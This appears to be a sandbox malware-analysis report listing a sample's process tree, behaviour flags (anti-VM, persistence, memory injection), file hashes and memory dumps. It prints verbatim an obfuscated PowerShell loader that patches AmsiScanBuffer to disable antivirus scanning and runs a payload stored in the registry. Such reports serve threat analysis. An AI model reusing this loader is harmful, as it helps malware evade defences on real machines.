PID 2252 wrote to memory of 436	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 756	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1072	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1080	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1200	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1220	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1272	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1320	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1448	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1456	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1516	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1572	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1592	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1716	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1732	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1776	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1828	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1892	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1528	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1676	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 1984	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 2072	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 2140	2252	dllhost.exe	spoolsv.exe
PID 2252 wrote to memory of 2244	2252	dllhost.exe	svchost.exe
PID 2252 wrote to memory of 2352	2252	dllhost.exe	svchost.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:636

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:560

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{b8377828-929b-43ee-9f69-7bf2a579ed36}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2252

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:436

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1220

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4304

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1044

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AQEQSsXneEVd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zqPrIoOTgjIPwx,[Parameter(Position=1)][Type]$pcFHOpjewr)$umAguEtgBgl=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'le'+[Char](99)+''+[Char](116)+''+[Char](101)+'d'+'D'+''+'e'+'l'+[Char](101)+'ga'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+'e'+'m'+[Char](111)+'ry'+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+'a'+'te'+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'',''+'C'+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+','+''+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+',A'+[Char](110)+''+'s'+''+'i'+''+[Char](67)+'l'+'a'+''+'s'+''+[Char](115)+''+','+''+[Char](65)+''+'u'+''+[Char](116)+'oCla'+[Char](115)+''+'s'+'',[MulticastDelegate]);$umAguEtgBgl.DefineConstructor(''+'R'+'T'+'S'+''+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+''+'l'+'N'+[Char](97)+'me'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$zqPrIoOTgjIPwx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+''+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+''+'e'+''+'d'+'');$umAguEtgBgl.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+[Char](107)+'e',''+[Char](80)+'u'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+'y'+'S'+'ig'+','+'N'+[Char](101)+'wSl'+'o'+''+[Char](116)+''+','+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$pcFHOpjewr,$zqPrIoOTgjIPwx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+'i'+'m'+''+[Char](101)+''+','+'Man'+'a'+'ged');Write-Output $umAguEtgBgl.CreateType();}$uhJvvrezRzuZQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+'i'+'c'+[Char](114)+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+'t.'+[Char](87)+'i'+[Char](110)+'32'+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+'f'+''+[Char](101)+''+'N'+''+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+'e'+''+'M'+'eth'+'o'+'ds');$fuacyMnXZyCvLd=$uhJvvrezRzuZQ.GetMethod(''+[Char](71)+'e'+[Char](116)+'Pr'+[Char](111)+'cA'+'d'+'d'+'r'+''+'e'+''+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jGSjWxrSbdJNDWHInaa=AQEQSsXneEVd @([String])([IntPtr]);$sUfVPzqStEVQDePjsPTKzV=AQEQSsXneEVd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gjGdSBXvWOQ=$uhJvvrezRzuZQ.GetMethod('G'+'e'+'t'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+[Char](108)+''+'e'+''+[Char](72)+''+[Char](97)+''+'n'+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+'nel'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')));$FiDHRsfwfuHrfE=$fuacyMnXZyCvLd.Invoke($Null,@([Object]$gjGdSBXvWOQ,[Object](''+'L'+''+[Char](111)+''+'a'+''+'d'+''+[Char](76)+'i'+'b'+''+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+'A'+'')));$MHGVGDORDxlWFsHcz=$fuacyMnXZyCvLd.Invoke($Null,@([Object]$gjGdSBXvWOQ,[Object](''+[Char](86)+'i'+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+'o'+'t'+''+[Char](101)+'c'+'t'+'')));$fYfmJEK=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FiDHRsfwfuHrfE,$jGSjWxrSbdJNDWHInaa).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+'i.'+[Char](100)+''+'l'+''+[Char](108)+'');$EHhzRrJOiEyzmxvjT=$fuacyMnXZyCvLd.Invoke($Null,@([Object]$fYfmJEK,[Object]('A'+'m'+'s'+[Char](105)+''+[Char](83)+'c'+[Char](97)+''+[Char](110)+''+'B'+'u'+'f'+''+[Char](102)+''+'e'+''+[Char](114)+'')));$ttmblTvobe=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MHGVGDORDxlWFsHcz,$sUfVPzqStEVQDePjsPTKzV).Invoke($EHhzRrJOiEyzmxvjT,[uint32]8,4,[ref]$ttmblTvobe);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$EHhzRrJOiEyzmxvjT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MHGVGDORDxlWFsHcz,$sUfVPzqStEVQDePjsPTKzV).Invoke($EHhzRrJOiEyzmxvjT,[uint32]8,0x20,[ref]$ttmblTvobe);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+'$'+''+'7'+''+[Char](55)+'s'+[Char](116)+''+'a'+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3364

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:484

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1288

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1448

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1516

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:2996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1572

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1716

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1776

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1892

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1528

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1984

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2072

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2140

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2244

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2500

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2532

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2616

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2636

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2716

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3044

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3196

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3380

C:\Users\Admin\AppData\Local\Temp\a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe
"C:\Users\Admin\AppData\Local\Temp\a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4972

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:2272

C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
"C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
4⤵
- Executes dropped EXE
PID:1968

C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4436

C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
"C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1936

C:\Users\Admin\AppData\Local\Temp\1000046001\Kaxhwswfup.exe
"C:\Users\Admin\AppData\Local\Temp\1000046001\Kaxhwswfup.exe"
6⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2820

C:\Users\Admin\AppData\Local\Temp\$7760c8f0
"C:\Users\Admin\AppData\Local\Temp\$7760c8f0"
7⤵
- Executes dropped EXE
PID:3368

C:\Users\Admin\AppData\Local\Temp\$772f9fd5
"C:\Users\Admin\AppData\Local\Temp\$772f9fd5"
7⤵
- Executes dropped EXE
PID:4412

C:\Users\Admin\1000006002\18571080f2.exe
"C:\Users\Admin\1000006002\18571080f2.exe"
4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2824

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3600

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3928

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:4000

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4072

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:1108

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3444

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3024

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2196

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2964

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4100

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\1000006002\18571080f2.exe
Filesize
2.1MB

MD5
1c7a02bb53ab156eb200122c93dde12f

SHA1
4b52e8d87ce511b05aa619a782e14f7e6625f37c

SHA256
c9b4047be7c4b7190533db32c67b85fe51c1692cca1d36944ad2f4d554b9320a

SHA512
72a7d5002a6972b3a7a5230cf68a54760ab282e43838cc27053dbf39eaf1bbfb370c83080a68544ae523ddeefa3e1a53fd46b9ac8715b1b74747933060061b8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
Filesize
1.9MB

MD5
6e14c3b7c3374ca36a6a193eecbe6ff3

SHA1
481b77201a9abe4ee619642aa34048b813d940eb

SHA256
433c09a91cf3b14922f0f1f7833cfc172c3752c38a9fee67a42dd8b4f3dc1a51

SHA512
f3cdaaad74f2e855e0144a93eb0751c54dd7d2fc615f08f9c52c6b11f3fcb01bccee283eec92ac2776aba5793b8290fa94842e7480713985aad355ee29a44a99

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000046001\Kaxhwswfup.exe
Filesize
4.5MB

MD5
133fda00a490e613f3a6c511c1c660eb

SHA1
e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9

SHA256
cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

SHA512
f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd

Download Submit
C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
Filesize
1.5MB

MD5
32187c18a470b54095365f8db359a671

SHA1
3ce7f687006e176a5b1554e30decdfed60e35aae

SHA256
a3ad43bf945a9448fbeeb1ce1a9eeb86910dd98c25600eb2eea37c665c90f948

SHA512
a9873b6ac3f480ad881bee4fe52d960127696f816007ee1ed4a2511ff82f7cc10ec98ef16cdc2869b49b716d3453ee6a7d952a1988083d046ba05dd9d579449a

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_sjwpayc3.ltp.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/484-5754-0x0000000000C30000-0x0000000001107000-memory.dmp

Filesize
4.8MB

Download
memory/484-5791-0x0000000000C30000-0x0000000001107000-memory.dmp

Filesize
4.8MB

Download
memory/1044-5019-0x0000000000810000-0x0000000000CFC000-memory.dmp

Filesize
4.9MB

Download
memory/1044-5011-0x0000000000810000-0x0000000000CFC000-memory.dmp

Filesize
4.9MB

Download
memory/1288-5788-0x0000000000810000-0x0000000000CFC000-memory.dmp

Filesize
4.9MB

Download
memory/1936-5007-0x0000000000C30000-0x0000000001107000-memory.dmp

Filesize
4.8MB

Download
memory/1936-63-0x0000000000C30000-0x0000000001107000-memory.dmp

Filesize
4.8MB

Download
memory/1968-5679-0x0000000000810000-0x0000000000CFC000-memory.dmp

Filesize
4.9MB

Download
memory/1968-5743-0x0000000000810000-0x0000000000CFC000-memory.dmp

Filesize
4.9MB

Download
memory/2272-30-0x0000000000810000-0x0000000000CFC000-memory.dmp

Filesize
4.9MB

Download
memory/2272-29-0x0000000000810000-0x0000000000CFC000-memory.dmp

Filesize
4.9MB

Download
memory/2272-28-0x0000000000810000-0x0000000000CFC000-memory.dmp

Filesize
4.9MB

Download
memory/2272-24-0x0000000000810000-0x0000000000CFC000-memory.dmp

Filesize
4.9MB

Download
memory/2272-25-0x0000000000810000-0x0000000000CFC000-memory.dmp

Filesize
4.9MB

Download
memory/2272-23-0x0000000000810000-0x0000000000CFC000-memory.dmp

Filesize
4.9MB

Download
memory/2272-26-0x0000000000810000-0x0000000000CFC000-memory.dmp

Filesize
4.9MB

Download
memory/2272-4273-0x0000000000810000-0x0000000000CFC000-memory.dmp

Filesize
4.9MB

Download
memory/2272-27-0x0000000000810000-0x0000000000CFC000-memory.dmp

Filesize
4.9MB

Download
memory/2272-64-0x0000000000810000-0x0000000000CFC000-memory.dmp

Filesize
4.9MB

Download
memory/2272-22-0x0000000000810000-0x0000000000CFC000-memory.dmp

Filesize
4.9MB

Download
memory/2820-111-0x0000000006820000-0x0000000006A60000-memory.dmp

Filesize
2.2MB

Download
memory/2820-137-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2820-5716-0x0000000006F00000-0x0000000006F54000-memory.dmp

Filesize
336KB

Download
memory/2820-5001-0x0000000006DB0000-0x0000000006DFC000-memory.dmp

Filesize
304KB

Download
memory/2820-5000-0x0000000006CD0000-0x0000000006D4E000-memory.dmp

Filesize
504KB

Download
memory/2820-127-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2820-129-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2820-117-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2820-119-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2820-125-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2820-133-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2820-136-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2820-110-0x0000000000680000-0x0000000000B06000-memory.dmp

Filesize
4.5MB

Download
memory/2820-139-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2820-113-0x0000000006B00000-0x0000000006B92000-memory.dmp

Filesize
584KB

Download
memory/2820-112-0x0000000007010000-0x00000000075B6000-memory.dmp

Filesize
5.6MB

Download
memory/2820-115-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2820-114-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2820-123-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2820-121-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2820-132-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2820-149-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2820-147-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2820-145-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2820-143-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2820-141-0x0000000006820000-0x0000000006A5A000-memory.dmp

Filesize
2.2MB

Download
memory/2824-87-0x0000000000CB0000-0x0000000001326000-memory.dmp

Filesize
6.5MB

Download
memory/2824-89-0x0000000000CB0000-0x0000000001326000-memory.dmp

Filesize
6.5MB

Download
memory/2824-5024-0x0000000000CB0000-0x0000000001326000-memory.dmp

Filesize
6.5MB

Download
memory/2824-88-0x0000000000CB0000-0x0000000001326000-memory.dmp

Filesize
6.5MB

Download
memory/2824-83-0x0000000000CB0000-0x0000000001326000-memory.dmp

Filesize
6.5MB

Download
memory/2824-91-0x0000000000CB0000-0x0000000001326000-memory.dmp

Filesize
6.5MB

Download
memory/2824-90-0x0000000000CB0000-0x0000000001326000-memory.dmp

Filesize
6.5MB

Download
memory/2824-86-0x0000000000CB0000-0x0000000001326000-memory.dmp

Filesize
6.5MB

Download
memory/2824-85-0x0000000000CB0000-0x0000000001326000-memory.dmp

Filesize
6.5MB

Download
memory/2824-84-0x0000000000CB0000-0x0000000001326000-memory.dmp

Filesize
6.5MB

Download
memory/3364-5044-0x0000022951BD0000-0x0000022951BFA000-memory.dmp

Filesize
168KB

Download
memory/3364-5043-0x0000022951840000-0x0000022951862000-memory.dmp

Filesize
136KB

Download
memory/4304-5008-0x0000000000C30000-0x0000000001107000-memory.dmp

Filesize
4.8MB

Download
memory/4304-5021-0x0000000000C30000-0x0000000001107000-memory.dmp

Filesize
4.8MB

Download
memory/4436-62-0x0000000000B00000-0x0000000000FD7000-memory.dmp

Filesize
4.8MB

Download
memory/4436-49-0x00000000770C6000-0x00000000770C8000-memory.dmp

Filesize
8KB

Download
memory/4436-48-0x0000000000B00000-0x0000000000FD7000-memory.dmp

Filesize
4.8MB

Download
memory/4972-21-0x00000000009D0000-0x0000000000EBC000-memory.dmp

Filesize
4.9MB

Download
memory/4972-7-0x00000000009D0000-0x0000000000EBC000-memory.dmp

Filesize
4.9MB

Download
memory/4972-4-0x00000000009D0000-0x0000000000EBC000-memory.dmp

Filesize
4.9MB

Download
memory/4972-8-0x00000000009D0000-0x0000000000EBC000-memory.dmp

Filesize
4.9MB

Download
